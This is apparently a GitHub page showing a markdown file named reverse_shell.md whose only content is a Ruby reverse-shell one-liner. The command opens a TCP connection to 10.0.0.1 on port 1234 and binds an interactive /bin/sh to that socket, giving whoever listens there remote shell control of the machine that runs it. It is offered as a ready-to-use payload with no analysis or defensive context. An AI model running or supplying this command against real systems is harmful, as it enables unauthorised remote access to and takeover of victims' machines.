Skip to content

Latest commit

 

History

History
3 lines (3 loc) · 118 Bytes

reverse_shell.md

File metadata and controls

3 lines (3 loc) · 118 Bytes

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'